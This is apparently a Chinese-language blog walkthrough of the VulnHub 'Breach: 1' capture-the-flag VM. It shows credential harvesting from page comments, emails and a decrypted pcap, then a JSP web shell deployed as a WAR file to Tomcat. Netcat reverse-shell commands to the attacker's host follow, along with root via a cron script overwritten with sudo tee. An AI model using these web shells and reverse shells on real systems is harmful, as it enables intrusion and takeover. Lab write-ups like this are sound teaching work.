vulnhub - BREACH: 1

Mar10發表於2024-06-13

vulnhub - BREACH: 1

描述

作為多部分系列中的第一部分,Breach 1.0 旨在成為初學者到中級的 boot2root/CTF 挑戰。解決將需要可靠的資訊收集和永續性相結合。不遺餘力。
VM 配置了靜態 IP 地址 (192.168.110.140),因此您需要將主機專用介面卡配置到此子網。
非常感謝 knightmare 和 rastamouse 的測試和反饋。
感謝 g0tmi1k 維護 #vulnhub 並主持我的第一個挑戰。
如果您遇到任何問題,您可以在 Twitter 上找到我:https://twitter.com/mrb3n813 或在 #vulnhub 中的 IRC 上。
期待撰寫文章,尤其是任何意外的本地/根路徑。

環境搭建

修改此處為

image-20240605202633903

修改為主機模式,kali也要改

image-20240605202743631

重啟後出現對應網路卡配置即為設定成功

image-20240606020807050

資訊收集 - 80埠

nmap掃描埠,發現埠全開,還是優先關注常用的埠

訪問web頁面,檢視原始碼

<!DOCTYPE html>

<html>
<head>
<title>Welcome to Breach 1.0</title>
</head>

<body bgcolor="#000000">

<font color="green">
<p>Initech was breached and the board of directors voted to bring in their internal Initech Cyber Consulting, LLP division to assist. Given the high profile nature of the breach and nearly catastrophic losses, there have been many subsequent attempts against the company. Initech has tasked their TOP consultants, led by Bill Lumbergh, CISSP and Peter Gibbons, C|EH, SEC+, NET+, A+ to contain and perform analysis on the breach.</p> 

<p>Little did the company realize that the breach was not the work of skilled hackers, but a parting gift from a disgruntled former employee on his way out. The TOP consultants have been hard at work containing the breach. 
However, their own work ethics and the mess left behind may be the company's downfall.</p>

<center><a href="initech.html" target="_blank"> <img src="/images/milton_beach.jpg" 
width=500 height=500> </a></center>


<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

</body>
</html>

得到註釋,解兩次base64得到一個使用者密碼

pgibbons:damnitfeel$goodtobeagang$ta

還有一個連結指向192.168.110.140/initech.html,原始碼有註釋

<!--I'm sitting on a beach reading your email! -->

點選進入Employee portal會跳轉到http://192.168.110.140/impresscms/user.php

指紋探測

image-20240606021807476

有登入框,嘗試登入。用剛才得到的使用者密碼

登入成功後發現有三封郵件

來自 ImpressCMS Admin

Posting sensitive content 

Peter, yeahhh, I'm going to have to go ahead and ask you to have your team only post any sensitive artifacts to the admin portal. My password is extremely secure. If you could go ahead and tell them all that'd be great. -Bill 

來自Michael Bolton

IDS/IPS system

Hey Peter,

I got a really good deal on an IDS/IPS system from a vendor I met at that happy hour at Chotchkie's last week!

-Michael

來自ImpressCMS Admin

FWD: Thank you for your purchase of Super Secret Cert Pro!

Peter, I am not sure what this is. I saved the file here: 192.168.110.140/.keystore Bob ------------------------------------------------------------------------------------------------------------------------------------------- From: registrar@penetrode.com Sent: 02 June 2016 16:16 To: bob@initech.com; admin@breach.local Subject: Thank you for your purchase of Super Secret Cert Pro! Please find attached your new SSL certificate. Do not share this with anyone!

這封提到了192.168.110.140/.keystore,結合後文提到的SSL certificate應該就是SSL證書

但是還沒有地方可以匯入使用,利用搜尋框,輸入SSL試試

SSL implementation test capture

Team - I have uploaded a pcap file of our red team's re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to 'tomcat'. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I'm going fishing for the next 2 days and will not have access to email or phone.

果然搜到了一封郵件,告訴我們有一個流量包,別名、儲存密碼和金鑰都設定為“tomcat”

列出名為 "keystore" 的金鑰庫中儲存的證書和金鑰

keytool -list -keystore keystore

image-20240606141410074

keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12

生成符合要求的證書,開啟流量包

編輯->首選項->Protocols->TLS->RSA keys list 單擊key file 新增

image-20240606211231201

看了一下各個流的資訊

&lt;role rolename="manager-gui"/&gt;
&lt;user username="tomcat" password="s3cret" roles="manager-gui"/&gt;

這裡拿到了一個使用者密碼

Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC

解base64得到tomcat:Tt\5D8F(#!*u=G)4m7zB,應該也是一個使用者密碼

還有一個可疑網頁https://192.168.110.140:8443/_M@nag3Me/html,要開代理抓包訪問

資訊收集 - 8443埠

訪問時要求輸入使用者密碼

image-20240606212202413

tomcat:Tt\5D8F(#!*u=G)4m7zB登入成功

指紋探測

image-20240606212416587

看到一個檔案上傳點,可傳war包

image-20240606212804483

將shell.jsp打包成war包

<%
Runtime.getRuntime().exec(request.getParameter("shell"));
%>

shell.jsp單獨放置一個目錄,命令列下進入當前目錄

jar -cvf Login.war shell.jsp

訪問檔案位置https://192.168.110.140:8443/shell/shell.jsp,有定時任務刪檔案,所以選擇反彈shell

nc -v 192.168.110.128 8888 -e /bin/bash

image-20240606223044987

開啟互動

python -c 'import pty;pty.spawn("/bin/sh")'

檢視/etc/passwd,關注以下兩個使用者

milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

再尋找一下可疑檔案,在/var/www/5446下有兩個php檔案

image-20240606223541601

檢視得到了mysql的使用者密碼

// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );

// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );

直接登入

mysql -u root -p

查表

image-20240606230105409

image-20240606230018493

拿到了使用者milton的密碼,md5破解

image-20240606230229617得到密碼 thelaststraw

登入milton卻發現無法提權

$ su milton
su milton
Password: thelaststraw

milton@Breach:/var/www/5446$ sudo -l
sudo -l
[sudo] password for milton: thelaststraw

Sorry, user milton may not run sudo on Breach.

到處找痕跡。。

image-20240606230956644

發現兩張圖片的許可權有區別,下載到本機

image-20240606231451799

exiftool檢視

image-20240606231541555

bill.png果然拿到了資訊,嘗試後發現是使用者blumbergh的密碼

登入檢視可用提權方式

image-20240606231925532

找到相應提權命令

image-20240606232109200

那再次反彈shell

echo nc -v 192.168.110.128 7777 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

注意!這裡不要自己立刻執行,這樣會提權失敗需要等它自己觸發

image-20240606232630419